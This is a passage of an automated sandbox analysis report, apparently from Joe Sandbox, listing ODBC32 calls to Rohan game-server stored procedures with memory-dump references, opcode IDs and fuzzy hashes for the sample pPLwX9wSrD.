                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042C44A
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetItemOfCharacter] (?)}, xrefs: 0042C3CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetItemOfCharacter] (?)}
                                                                                      • API String ID: 0-2437505128
                                                                                      • Opcode ID: fdb37e59cf5ba2b77e31ca1f47e2f597dc3ea08b18d235770ea65255e8021d19
                                                                                      • Instruction ID: 25abc788708ad938164c49917f986b1aa90f61538bbb663bf6833fba4303cb55
                                                                                      • Opcode Fuzzy Hash: fdb37e59cf5ba2b77e31ca1f47e2f597dc3ea08b18d235770ea65255e8021d19
                                                                                      • Instruction Fuzzy Hash: 421100F1A44218ABEB20CF54CC42FAA7374EB44718F108289F7686A2C4D7B5A9448F5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_DelItem]( ? )},000000FD), ref: 0042C78E
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042C7CD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042C805
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_DelItem]( ? )}, xrefs: 0042C785
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_DelItem]( ? )}
                                                                                      • API String ID: 0-2813541423
                                                                                      • Opcode ID: a9d3a094de4c18615735ff103fe3523389179005eaac3ffd0286658fcbfdac29
                                                                                      • Instruction ID: 707ff6a2f5378757073d536e8392b129c0e242acebfecd124aa6431bc0f9b790
                                                                                      • Opcode Fuzzy Hash: a9d3a094de4c18615735ff103fe3523389179005eaac3ffd0286658fcbfdac29
                                                                                      • Instruction Fuzzy Hash: 901103F5644214ABEB648F44CC42F9B7334EB85714F208299F71C2B2C5C57569808B5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_HonorPvPCronRealTime](?)},000000FD), ref: 0043E841
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043E880
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043E8B8
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_HonorPvPCronRealTime](?)}, xrefs: 0043E838
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_HonorPvPCronRealTime](?)}
                                                                                      • API String ID: 0-1235316946
                                                                                      • Opcode ID: 0501add0b6689dbbb95fcef0d3ffbace9547b8d11678e779e8c84f423b8308a2
                                                                                      • Instruction ID: 1e5493717cc5b9c445aa48692fe8803974ac656cdff961c3a8f87d3cd5209f2b
                                                                                      • Opcode Fuzzy Hash: 0501add0b6689dbbb95fcef0d3ffbace9547b8d11678e779e8c84f423b8308a2
                                                                                      • Instruction Fuzzy Hash: F11125B5A40218BBEB28CF44CC42FDA7374EB85F14F208289F7146E2C4D6B56D408F88
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_ViolenceDuel_GetCharInfo] (?)},000000FD), ref: 0044291C
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0044295E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00442993
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_ViolenceDuel_GetCharInfo] (?)}, xrefs: 00442913
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_ViolenceDuel_GetCharInfo] (?)}
                                                                                      • API String ID: 0-3839866921
                                                                                      • Opcode ID: cdcf2f16ce7911006111f3eec46f648559e2a5af5aee4bca3b28cc789681cc81
                                                                                      • Instruction ID: 074be44c189fcf4734a65258d49db216d9f4b74c849fdb3adc468a0fca7438b1
                                                                                      • Opcode Fuzzy Hash: cdcf2f16ce7911006111f3eec46f648559e2a5af5aee4bca3b28cc789681cc81
                                                                                      • Instruction Fuzzy Hash: 8F1182B0A40218ABEB20CF05CC42FDA7374EB48719F108285F7146F2D1D1B1AD418B48
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetMaxRevengeID] (?)},000000FD), ref: 0043D8D6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043D915
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043D94D
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetMaxRevengeID] (?)}, xrefs: 0043D8CD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetMaxRevengeID] (?)}
                                                                                      • API String ID: 0-1888541422
                                                                                      • Opcode ID: 6c8a82fb7f083deede18d03557995cd73123011fba86b05107f336f0b5f29643
                                                                                      • Instruction ID: a897dd4d1888d2b253497160e478be1943c82f2df6bcb7542ce50e5e648f3e54
                                                                                      • Opcode Fuzzy Hash: 6c8a82fb7f083deede18d03557995cd73123011fba86b05107f336f0b5f29643
                                                                                      • Instruction Fuzzy Hash: 951100B4A44258ABEF24CF54CC52FE97374EB44714F108289F798AB2C4DAF569809F68
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetMaxLootBox](?)},000000FD), ref: 00435A16
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00435A55
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00435A8D
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetMaxLootBox](?)}, xrefs: 00435A0D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetMaxLootBox](?)}
                                                                                      • API String ID: 0-2496041405
                                                                                      • Opcode ID: 65c80c1cb47d763901dd4a40259a08483187e876948c142b84ab0abe1a7ddeaa
                                                                                      • Instruction ID: 3afc4e431548a448dca2f1931ea92fdd991a458715b4acf8ad62215eb3541ae0
                                                                                      • Opcode Fuzzy Hash: 65c80c1cb47d763901dd4a40259a08483187e876948c142b84ab0abe1a7ddeaa
                                                                                      • Instruction Fuzzy Hash: F7110CB4B54218ABEB24DF44CC52FAA7334EB85718F208289F7582E2C4C7B56940CF59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetMaxLootMoney](?)},000000FD), ref: 00435AB7
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00435AF6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00435B2E
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetMaxLootMoney](?)}, xrefs: 00435AAE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetMaxLootMoney](?)}
                                                                                      • API String ID: 0-3264818900
                                                                                      • Opcode ID: 3a3e6fdcd55a636b33c2bc44892e1761333c6cd15f8bb3df17660292ae0e653a
                                                                                      • Instruction ID: ab8ffbfe7fe1fdf796c39e739fca5705ed467bef370198113e9f09684a896bee
                                                                                      • Opcode Fuzzy Hash: 3a3e6fdcd55a636b33c2bc44892e1761333c6cd15f8bb3df17660292ae0e653a
                                                                                      • Instruction Fuzzy Hash: D511FAB0B44218BFEB24CF44CC52FAA7734EB45B18F108289F7596A2C0D7B569408F59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetCharTitleList] (?)},000000FD), ref: 0043A166
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043A1A5
